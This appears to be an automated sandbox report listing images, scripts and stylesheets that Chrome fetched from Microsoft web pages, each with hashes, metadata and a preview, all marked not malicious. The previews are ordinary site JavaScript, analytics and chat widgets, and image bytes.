                                                                                                                                                              Preview:/*! For license information please see webchat.js.LICENSE.txt */.!function(e,t){if("object"==typeof exports&&"object"==typeof module)module.exports=t();else if("function"==typeof define&&define.amd)define([],t);else{var r=t();for(var n in r)("object"==typeof exports?exports:e)[n]=r[n]}}(self,(function(){return function(){var e,t,r={37825:function(e,t,r){"use strict";var n=r(92412),i={childContextTypes:!0,contextType:!0,contextTypes:!0,defaultProps:!0,displayName:!0,getDefaultProps:!0,getDerivedStateFromError:!0,getDerivedStateFromProps:!0,mixins:!0,propTypes:!0,type:!0},o={name:!0,length:!0,prototype:!0,caller:!0,callee:!0,arguments:!0,arity:!0},a={$$typeof:!0,compare:!0,defaultProps:!0,displayName:!0,propTypes:!0,type:!0},s={};function c(e){return n.isMemo(e)?a:s[e.$$typeof]||i}s[n.ForwardRef]={$$typeof:!0,render:!0,defaultProps:!0,displayName:!0,propTypes:!0},s[n.Memo]=a;var u=Object.defineProperty,l=Object.getOwnPropertyNames,p=Object.getOwnPropertySymbols,d=Object.getOwnPropertyDes
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ISO Media, AVIF Image
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):32505
                                                                                                                                                              Entropy (8bit):7.992490402812611
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:6311A79A5C9FE17CDFC12CB4E8A32441
                                                                                                                                                              SHA1:26873F438F347E7E4EB955ED86B0302E126E4934
                                                                                                                                                              SHA-256:E7A04F56CE09F34DA960FA4AE9503BF47307112967FA06458847B438328F08A2
                                                                                                                                                              SHA-512:D03BCEC53BEB064EB429772EEFF0FC595061D16186A00B5D8D93D282F0EDCB9D76CEFB3476AACACF72127D6298524C9EEF52B59CA6475C22C6C947C33F0FFD1A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:"https://cdn-dynmedia-1.microsoft.com/is/image/microsoftcorp/ProductOverview_WhyPBI_2.1?resMode=sharp2&op_usm=1.5,0.65,15,0&wid=2000&qlt=95&fit=constrain"
                                                                                                                                                              Preview:... ftypavif....avifmif1miafMA1B....meta.......(hdlr........pict............libavif.....pitm..........iloc....D...............}....(iinf..........infe........av01Color....jiprp...Kipco....ispe...........&....pixi............av1C........colrnclx...........ipma.................}.mdat.....*..%..B2....,.M4.A$@....p...,p..D*.u......8....2F..u.".c...BH..=......Gw.x..xS9......FyQ..S..6.`p%.$kA.G.M... .Z[s..L........7.$A..@yi...E|...j&6*....%.)@\...<..!.`..&w....4......<.S$.=......9.....YwJ......?........$....../^......Xs...............WJ..X..t........D9..../.2.bC....j......_.... ..>..R7%.)..,.7I3..3....~..Ta......;.\`.y....Yj..K.Si.~.. 3.e.(......q.mrGF.....|.:....$..h..m.~6...\#a>.5.N..,..Fk.E.mE...9.%..=..0.k......./[...n..."..X;'jH...X..n.....oO/.8...L?..V.?..q......C.......isP#.c.`w..\......{..&g.b....1:.......Q....@.6V.i...D...(...5....Nn.Q5`..8m..xj.wsG..P."S.9i"...zd.A.U..?.sd...J.5....t....,..@J.{*.1.nm....$.).v+..B.x@..U.Aq...Pg....).z.R.!.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 129x128, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):864
                                                                                                                                                              Entropy (8bit):7.703439919110448
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:DF0D9667FE8D6C899DF6866EB045CCF7
                                                                                                                                                              SHA1:BE3F851E3A213FC441F66922A6F162287ACE027C
                                                                                                                                                              SHA-256:22856B6F06BCA03A7424851AF345E6ECE34CB8B5BAD703C525A968164D686F92
                                                                                                                                                              SHA-512:9958AAFC06DAC5961A57323246B37AC907BF1753EB2445C0761E6A1A57A0C1775BDDB33582E3D1C7E886945A4597CAA88F9D92FDC48E30EA15D4AC027C6B68CA
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFFX...WEBPVP8 L........*....>...A...m...q--..|8..[....._..}8G........t....?.....05!x..K...O._.~.#...O...........2......7..Q5.x.!..dG.0..i....y.}I...xq..k.....+E"...]vm.)*.. .....tw.,`Cuo0i..*...jj.hc.[....L..)...X..Q.....&...eI5...F.o...\.q.g..X.ASR............ST~.P...g.-..#..t......b1.uM....|.Kg.Z?...8.........%\...(..7....m'..-E.i./ ......h.....+...X....H!d..L}...k......N.......E.W.F.k9.1.......1.....r.Yp@..D.F\.Y>r.<(..+~..nVW...}|u8.<.*.E....x"u....C.NX....J..8..L....... W....^.;A}D.....A..<;.B...DG.1h.~l.N...^.ls..c..)vxN.w.6.......q..........X...ew.O..gbW....1.6....KO..1.SE.v.......e..o....l.n.........I...?..J.sv..:..S..z..A.b....)..... .O...<P..~;..g..YI..:.`...>h..,..T.}..H..A._.?E.....c..cw.'.;#...|q..].).o.....y.......~^.......;.F..a.R.0...l.......|qp..1}.Z.W3.....0.....7l....7.....cx....P.$...{.1u.`.....
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):95902
                                                                                                                                                              Entropy (8bit):7.996588076685907
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:41045904EFD854EC26AB735E9C81E163
                                                                                                                                                              SHA1:C37B87B199F9474555A0CE2F952F9164B74881BD
                                                                                                                                                              SHA-256:9A7C76ECAB6DEA90B19E003C7DAC68BB6F4D6461ECAA72EDE84D2D95136F8313
                                                                                                                                                              SHA-512:19A1441B9F145DDBD34FB7BB2FEA4FD54E104E0323AD9AFF8931C4E9E1605D5250F1F35F579A231E491841E4FE95C12F65E081A4EFABBE2AC24EE24A5AB2D5B0
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.v..WEBPVP8 .v...-...*..&.>...B!.BU(..a,...,..C.V+O;.#..i_.....6........V.z.'.K.C...&.m.?...ci4.?......o.Zo._..#...C......s.g.....+...?..:.o.^Z.../.?.........w...[.........................?....M...?..............?.......n........%.W.......~@...f.K.u....._....s_...?.~t}........S............................_...~..........+...........?y...k.K.S...?l.m...?.....^....?......[.o.[.....,.:?..w.........f......._..w?............>......S...../..?.._......./.....~)~.y.k.....~.}................w..e/.?....s......?....V.......w....?..i...s..?.w.........o._.?....#.....w......./...........?......w..........................+.....O.?....6.c?.~n....}.~.........Fm..Q.j)Tf.U..v........P......O<xW..*..!....X...T...sm7...I.m.,m..Q.j)Tf.U....Fm.J.....=%....A.w..-..u.iUWE...\_...9g... ....3mE*..QJ.6.......W..h..r..a.fGg..Oo.]..,l.&C...."..,.!..Z.~vT..>w....h.H;...;..[k4.$...O..`-...Q......N|.U...(8.:..b.x$C..}.)..z.?.u.8:.g.9a....).q4......~?C..M.. &=.....f....A..=..
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):160392
                                                                                                                                                              Entropy (8bit):7.997851417632738
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D65D5312D294F2DF7DF7E1E69A4DEFA8
                                                                                                                                                              SHA1:97989E720FC7F51EE86D187385E1E540686A0BA2
                                                                                                                                                              SHA-256:6E262CC3BB8AC8F731AA29AD65F4681D8D0E1F6C583A0F64C6F521EDDB9372EA
                                                                                                                                                              SHA-512:EF937485FB7EF5364EAA8FA4935BDFF0A42123F1EACC5CAB32B424CEEF5C2993D26754F1B8C5E05FF63DCCFDDE2C79DD555A8991C0D10DD4A08E1A0A0BBF5678
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.r..WEBPVP8X...........%..ALPH......p.....h.....E....s.................................................................................................................................................................(.VP8 .q..p(...*..&.>...A..nE>..a,..........+..c[...6._.....-..[.b.]x:Z\....K........7./.......|..~.G.7...?.?=\..w.|....g..........>...|Ey.........W.............9......._....../...........w.?........o...O....}~............. ...6.;.....O..._..........w.../._.......................?......?.g........@?.......{.....'._........^.W.{..._...~...e...=...g.................................C.S.7.j............{.....8...W.../.?.~..Z.............>..).O._..........G./.?..n.C.....o..........?...?m.....%...O.o..........o...........R.w.#......./.?..............>.......O..>R......._.?.?......I...w...............?....v.7.../....O.........3............?.K.o.....?2.....O...........;......._........g...o.......H.....j..........................(n...o..mn....x..^<\T.(a
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:C++ source, ASCII text
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):697
                                                                                                                                                              Entropy (8bit):4.9687589816244095
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:D2F3218A374A1305FE262FC4BAEEDDD1
                                                                                                                                                              SHA1:103721E516DC86A8EC433C6EA7C227BF7D954A55
                                                                                                                                                              SHA-256:F76208F59F7E18EFB405361893B45B9DD7D0759BB5329AC664F39C02384982CD
                                                                                                                                                              SHA-512:011062B7E77B5BBCACC6391C6E9873D4221E3474276F56D36EF29B78EA9E7C1C6C2021DA3D80D79C30E1675AC0CE62DC397C52051C7C1478054C02AF27BC7077
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/**. * OneCloud environment constants class.. */.class OneCloudEnvironmentConstants {.. /**. * OneCloud data connector AEM publisher variables.. * @readonly. */. static DataConnector = Object.freeze({. "endpoint": "/msonecloudapi",. queryParams: {}. });.. /**. * Microsoft API Prod Endpoint. * @readonly. */. static MicrosoftAPI = Object.freeze({. "endpoint": "https://www.microsoft.com/msstoreapiprod". });.. /**. * Appsource Request Header. * @readonly. */. static AppsourceAPI = Object.freeze({. "header": "Njg1YmM2MWI1ZTA4MWVlMzAxZTQwM2YxMzk2MjU4YzljMDE3Nzc0NDM2MWMyMzg3MGQwZjMwYzIxZWY0ODMwMQ==". });.}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):1976
                                                                                                                                                              Entropy (8bit):4.4820518319503835
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:106A6A519DAD38A935C4D5AA2786D6FB
                                                                                                                                                              SHA1:3340ADF8A3220D92786A423BEED46092103C5D7D
                                                                                                                                                              SHA-256:C0F462098BFAC577C182C3A983C6A35A5016A5EE96655CF7B57A46F70EAB83EF
                                                                                                                                                              SHA-512:8F0E42976D0D5D362CECD6CDDBE3F1DC84BAC7149DBAA78C8787409EE4224D04E5FE8D68631799ABF3E2DFA04D97B87F9F93A9B3399632E15C135B527558273A
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/onecloud/components/content/reimagine/atomic/accordion/v2/accordion/clientlibs/site.min.ACSHASH106a6a519dad38a935c4d5aa2786d6fb.js
                                                                                                                                                              Preview:.(function (document) {. document.addEventListener("DOMContentLoaded", () => {. const attrElement = $(".ocr-accordion .btn-collapse");.. /**. * Data attributes for accordion elements.. * @typedef {Object} DataAttributes. * @property {string} off - Data attribute value when the element is collapsed.. * @property {string} on - Data attribute value when the element is not collapsed.. */. const dataAttributes = {. "bi-bhvr": { off: "7", on: "8" },. "bi-ct": { off: "Accordion Expend", on: "Accordion Collapse" },. };.. /**. * Update data attributes based on the collapse state.. * @param {Object} currentObj - Current collapse instance.. */. const updateDataAttribute = (currentObj) => {. const isCollapsed =. currentObj?.triggerElement.classList.contains("collapsed");.. Object.entries(dataAttributes).forEach(([attribute, values]) => {. const dataAttrValue = isCollapsed
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (29322), with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):29322
                                                                                                                                                              Entropy (8bit):5.312522003173338
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:89416F80A433C105701781826A74BB42
                                                                                                                                                              SHA1:ACDF202A6B4D286A220DCFF7A8639F7E4B44F043
                                                                                                                                                              SHA-256:940AF9F2B22109831E80014BF6071CBD08F67E9623804A9B19A0467589046D9A
                                                                                                                                                              SHA-512:678D7A9013A50631427EF68555C4C0A34A9DA850CBB3FBF8CE25FDEEBFB38077A4E461A05C5B19BAC30AB62DEEC813534A5210D9A0F3A40DD1CABB433C7D41E9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://lpcdn.lpsnmedia.net/le_re/3.61.0-release_1396603402/jsv2/UISuite.js?_v=3.61.0-release_1396603402
                                                                                                                                                              Preview:window.lpTag=window.lpTag||{},lpTag.taglets=lpTag.taglets||{},lpTag.taglets.lpAnimate={_V:"1.2",name:"lpAnimate",elements:{},queue:{},conf:{interval:13,duration:500,easing:"swing"},init:function(t){if(t)for(var e=0;e<t.length;e++)this.conf[t[e].id]=t[e].value},_supported:{opacity:function(){var t=document.createElement("div");return t.style.cssText="opacity:.1",/^0.1/.test(t.style.opacity)}()},_regExp:{alphaFilter:new RegExp("alpha\\([^)]*\\)","i"),opacityInAlphaFilter:new RegExp("opacity=([^)]*)")},_cssPropHooks:{opacity:{get:function(t){return this._supported.opacity?parseFloat(t.style.opacity):this._regExp.opacityInAlphaFilter.test(t.style.filter)?.01*parseFloat(RegExp.$1):null},set:function(t,e){var n;this._supported.opacity?t.style.opacity=e:(n=t.style.filter||"",e="alpha(opacity="+100*e+")",n=this._regExp.alphaFilter.test(n)?n.replace(this._regExp.alphaFilter,e):n+" "+e,t.style.filter=n)}}},_cssNumber:{zIndex:!0,fontWeight:!0,opacity:!0,zoom:!0,lineHeight:!0,color:!0},_easing:{li
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (512)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):544
                                                                                                                                                              Entropy (8bit):5.221040627274746
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:383B23D12DF0D9265D7569A7102C2F96
                                                                                                                                                              SHA1:B78FB17F58484F5CD29B3FE307936181E1B30B57
                                                                                                                                                              SHA-256:BBF608E321107D6C4EEAF31A4A0EEB9DD8A9AB825F645FA963651688FD3D3914
                                                                                                                                                              SHA-512:8CA27D482871CAFF41C2D86CA743F075ED97465C12624B1841396B423229A90AFB7E62211BB02DFC0211C45BBABFD12F82EFF8863E6FD3D176FCD99C84747F60
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:'use strict';(function(){(function(b){var a=document.createElement("iframe");a.setAttribute("src","https://fpt.microsoft.com/tags?session_id\x3d"+b);a.style.width="100px";a.style.height="100px";a.style.cssText="display: none; color: rgb(0,0,0); float:left; position:absolute; top:-200px; left:-200px; border:0px";a.title="greenID";a.setAttribute("id","greenID");document.body.append(a)})(function(){return"10000000-1000-4000-8000-100000000000".replace(/[018]/g,b=>(b^crypto.getRandomValues(new Uint8Array(1))[0]&.15>>b/4).toString(16))}())})();
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (746)
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):893
                                                                                                                                                              Entropy (8bit):5.344119564581426
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:1F5D1E42610DA3D29195CCC71DB4FA06
                                                                                                                                                              SHA1:C8D43585847FB832AECC2212DDD2540A6D954453
                                                                                                                                                              SHA-256:ABC799278B985EB4547BB835700AFA9CE1BA92B67250AE52EEE6622D46435E2A
                                                                                                                                                              SHA-512:CDDDB4B6CE08E7A14D91015DDBEBC51DD2C7325284DEE4833FCD6E334BFB2E661D81186261969BD405FA72F44AACE56AE49A40B3C57DB55E55B8A23EB7DBD131
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCe86a4eb0fcba478dbcc7216ce8374629-source.min.js
                                                                                                                                                              Preview:// For license information, see `https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCe86a4eb0fcba478dbcc7216ce8374629-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/5ef092d1efb5/2537c33769cb/0c4dbba778f5/RCe86a4eb0fcba478dbcc7216ce8374629-source.min.js', "!function(){try{if((\"microsoft-365\"===window.location.pathname.split(\"/\")[2]||\"resilience\"===window.location.pathname.split(\"/\")[2])&&\"www.microsoft.com\"===window.location.host)if(document.querySelector(\"[id*=office-CustomMosaicCta]\")||document.querySelector(\"[id*=office-KeyMessages]\")){var t=document.createElement(\"style\");t.setAttribute(\"type\",\"text/css\"),t.innerText=\"[data-module='ow-mosaic-cta'] .c-call-to-action span,[data-module='ow-key-messages'] .ow-cta-container .ow-link-wrapper a.c-call-to-action span{color: inherit}\",document.head.append(t)}}catch(t){}}();");
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 1664x1062, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):159924
                                                                                                                                                              Entropy (8bit):7.997263790119889
                                                                                                                                                              Encrypted:true
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:76F3AF286B37976E1055D53318923EA2
                                                                                                                                                              SHA1:1E759016963486915C6467C61DB7FECC2B004197
                                                                                                                                                              SHA-256:5F09E928524C79A693636AABC872960DCAC636D398D95B0B1F001CC1AA249FE6
                                                                                                                                                              SHA-512:3AA93A00CC10009160E61A1BB38845731A5041EDA3DB95C540C2B8F76F62B6FB999EE1ABDB65E3FA390D18CC37053672A32F9ABF71F61F4E6D4CF106EA74ADC1
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF.p..WEBPVP8 .p..08...*..&.>...A..js/..a,..<....c... ).....g.[........c..D.M..k..H..W?..k.>G............>..W..._...S...}........o........U.'...............W|.............G....?...._.......?...>...~....{.../..............#..._....o...(.....'.............~....u......._................k...o..........q~........y...3../...?........?.'....._.................._..............O....._........'.........?............_.~.................~c...g....?.}.}......w.....A..|..3.'........o....?....;............;.s......................w?....x.av....?.~....w........y...../.g..V?....?........v.....+........^...o...?...}..h.3..............C.W./.........]...g........a...........Q.......?......e...O.o....s..~......................vZ...!L..B..$.0.I.]...En)...AX...D...G\.R!m)5..-......C.....NYV...l...qY..B..D..K}F ].2p...~...kB..$.0.I.`.....!M.^g.E..`k.>a.R..?.........i.;-r.....t...0.-...>.9.s.l......i...HS......!L..B..$...7......../k......cz..>...`..q....(...[6|Q..7.
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (65397)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):140778
                                                                                                                                                              Entropy (8bit):5.44675798903284
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:94FEEC31F6FD531C80B08FAE26EB275C
                                                                                                                                                              SHA1:96F904FC6D751F8CFBA18D506CB1067CB0AC25FC
                                                                                                                                                              SHA-256:1569DD95C870F769B2BC3909C52C08303956BEF7DFC288402D3B8BB13148BC10
                                                                                                                                                              SHA-512:EBFC643C65EA79F4930AE22AA752C79252B91D97B0A5BB4407D262BAF76C2BA84A05D0064E095D4DFC9BBE727B38428FF1D741C045F0B5A85ED38ED0A1A3C3C3
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:/*!. * 1DS JS SDK Analytics Web, 3.2.18. * Copyright (c) Microsoft and contributors. All rights reserved.. * (Microsoft Internal Only). */.!function(e,t){var n="undefined";if("object"==typeof exports&&typeof module!=n)t(exports);else if("function"==typeof define&&define.amd)define(["exports"],t);else{var i,n=typeof globalThis!=n?globalThis:e||self,r={},e="__ms$mod__",a={},o=a.esm_ms_analytics_web_3_2_18={},c="3.2.18",u="oneDS3",s=(s=n)[u]=s[u]||{},l=(l=n)[u="oneDS"]=l[u]||{},n=s[e]=s[e]||{},f=n.v=n.v||[],u=l[e]=l[e]||{},d=u.v=u.v||[];for(i in(u.o=u.o||[]).push(a),t(r),r)s[i]=r[i],f[i]=c,l[i]=r[i],d[i]=c,(o.n=o.n||[]).push(i)}}(this,function(n){"use strict";!function(e,t,n){var i=Object.defineProperty;if(i)try{return i(e,t,n)}catch(r){}typeof n.value!==undefined&&(e[t]=n.value)}(n,"__esModule",{value:!0});var c="function",u="object",fe="undefined",f="prototype",s="hasOwnProperty",l=Object,g=l[f],v=l.assign,y=l.create,e=l.defineProperty,T=g[s],I=null;function b(e){e=!1===(e=void 0===e||e
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (801), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):801
                                                                                                                                                              Entropy (8bit):4.5064125022638954
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:7F7C893B75CF7905DAA022D9C12D3778
                                                                                                                                                              SHA1:1E93FA7C449BF17ADFAA49B3F4A207AA7CC33C5A
                                                                                                                                                              SHA-256:602A274756F18D7A3B4CF8CD24620F1F0BAF070E72BF954F1C3502372E8EA72A
                                                                                                                                                              SHA-512:AED07BB051DB2424967F23AC8B11DFA52844BF63C20830F0796333DB77EB9CD8C796D33AF45131E70F42761E755923E1FEADCD2FDAF073AFF424776397C60F81
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:lpCb44650x34706([{"enabled":true,"whiteList":["microsoft.com","*.microsoft.com","microsoftstore.com.cn","*.microsoftstore.com.cn","office.com","*.office.com","googleusercontent.com","bingplaces.com","translatoruser-int.com","liveperson.com","*.liveperson.com","liveperson.net","*.liveperson.net","lprnd.net","*.lprnd.net","lpsnmedia.net","*.lpsnmedia.net","static-assets.dev.fs.liveperson.com","*.azure.com","signup.azure.com","azure.com","*.moscnuat.com","*.lpnet.com","*.azurewebsites.net","*.geologic.al","*.microsoft365.com","microsoft365.com","checkout.microsoft365.com","stores.office.com","*.googleusercontent.com","*.bingplaces.com","*.translatoruser-int.com","lpnet.com","moscnuat.com","azurewebsites.net","geologic.al","*.checkout.microsoft365.com","*.stores.office.com"],"deleted":false}]);
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with no line terminators
                                                                                                                                                              Category:downloaded
                                                                                                                                                              Size (bytes):32
                                                                                                                                                              Entropy (8bit):4.327819531114783
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:A8A3710424DC6E0DFF393C6964441BDB
                                                                                                                                                              SHA1:E4978066791DD394BDDD174F2687A7CDD43442B2
                                                                                                                                                              SHA-256:46CD047CC0D3D10776E2F50D4C9D55DB58BD97D7A95B7D691F53D4937C71CF00
                                                                                                                                                              SHA-512:EE135EE50868E59853C8FE57A9471AE1FBBDE30A929D33B4A4D56200E70C93AFDFF0301EF7FEBC803258C2BA2DCBC183E632B2ADA1745D3C87C1EEB98E8DEE62
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              URL:https://www.microsoft.com/etc.clientlibs/microsoft/components/content/universalheader/v1/universalheader/clientlibs/site.min.ACSHASHa8a3710424dc6e0dff393c6964441bdb.css
                                                                                                                                                              Preview:[class*="z-"]{position:relative}
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:RIFF (little-endian) data, Web/P image, VP8 encoding, 2750x1000, Suserng: [none]x[none], YUV color, decoders should clamp
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):58314
                                                                                                                                                              Entropy (8bit):7.972136313816049
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:85ED2E1EC55E11D3C996CE79821397C2
                                                                                                                                                              SHA1:50EA39A97C5156EECFB5456E2778F4C8D9EC5ADA
                                                                                                                                                              SHA-256:9F30C4B5CA95655555248699B6B1D65118EE36579BB966BA7CFE6E772F360749
                                                                                                                                                              SHA-512:334BE8EC66B1BD0039A004D980495EFB0BBF2EC4A1A3A398BA5955928E5C806F41AEFB094B38EA7F43820300429B6C0F1E59D6FD1C44B0F40C709C53517497C9
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:RIFF....WEBPVP8 .........*.......%...Il<..........H....q..k..Zi.?.......?.~....6.....J....i.......|o....a.x|..?]...o....?.z.<.......u...5.'.7.?..q...S....D...G.....?.>......{.....o....?..n..............4.......g...Oo.......f.....#.......s........a.....a...+...w.W........?A...7................s/.....?<.U.....?..K.[.../.o.z..w.................6.......?..m.........?...}..Q|..'._.../...?....M..._.................}.....?......_...7......~.z}~3....._..`...............................~........{..................?..._.>...?..O.<i.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.Li.J..>..8.....n.....R.77..>d..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1..1.y.=.}.o...b~h.rgY..z.N.F...
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (931), with no line terminators
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):931
                                                                                                                                                              Entropy (8bit):5.870929051831436
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:61BB1D83E4E4AECD6BC23206BF23B033
                                                                                                                                                              SHA1:ABE6ACF291ABC2101F8B9B913051A7DDEC2A16CF
                                                                                                                                                              SHA-256:617BCC13B05C41A27BDCAB13BD49CB42DCCB714A6660DDCD92F11317E132F93A
                                                                                                                                                              SHA-512:2F4568C53595D5B600DBBCD8198FD82E33E853FF69015D127BFB4DC7662B5A2E73FBD02D792E8992DEAD7A78D022B136381A22C2DA2CD3CA36A31FB7365EB069
                                                                                                                                                              Malicious:false
                                                                                                                                                              Reputation:unknown
                                                                                                                                                              Preview:(()=>{if(!document.querySelector("#lp-origin-trial")){var i=document.createElement("meta");i.id="lp-origin-trial";i.httpEquiv="origin-trial";i.content="A77GUxMF2gPljjeX2xdlt25iXAGDqu3SWLRaxp24NcNGz++ZE9fkggbPexLArxAguTbk/8W5OtGUm5ki+fqC0wMAAACSeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZyIsImV4cGlyeSI6MTcyNTQwNzk5OSwiaXNTdWJkb21haW4iOnRydWUsImlzVGhpcmRQYXJ0eSI6dHJ1ZX0=";document.head.append(i)}if(!document.querySelector("#lp-origin-trial-2")){i=document.createElement("meta");i.id="lp-origin-trial-2";i.httpEquiv="origin-trial";i.content="A2t91t+aauUx3llVKUfxbR2uQKP2Thff9JfAXeVYED6Sv31GOcqWZkJpcG+y9Cg2vfnTtPYXjBK9hzq5DyXyVgAAAACTeyJvcmlnaW4iOiJodHRwczovL2xwc25tZWRpYS5uZXQ6NDQzIiwiZmVhdHVyZSI6IkRpc2FibGVUaGlyZFBhcnR5U3RvcmFnZVBhcnRpdGlvbmluZzIiLCJleHBpcnkiOjE3NDIzNDIzOTksImlzU3ViZG9tYWluIjp0cnVlLCJpc1RoaXJkUGFydHkiOnRydWV9";document.head.append(i)}})();
                                                                                                                                                              Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                              File Type:ASCII text, with very long lines (655)
                                                                                                                                                              Category:dropped
                                                                                                                                                              Size (bytes):476900
                                                                                                                                                              Entropy (8bit):5.5048390520226524
                                                                                                                                                              Encrypted:false
                                                                                                                                                              SSDEEP:
                                                                                                                                                              MD5:763C942B927FE0F5D20F673EAEA8CA64
                                                                                                                                                              SHA1:1702988FC64DC26072BDCA99D237F9C8AEF5DC75
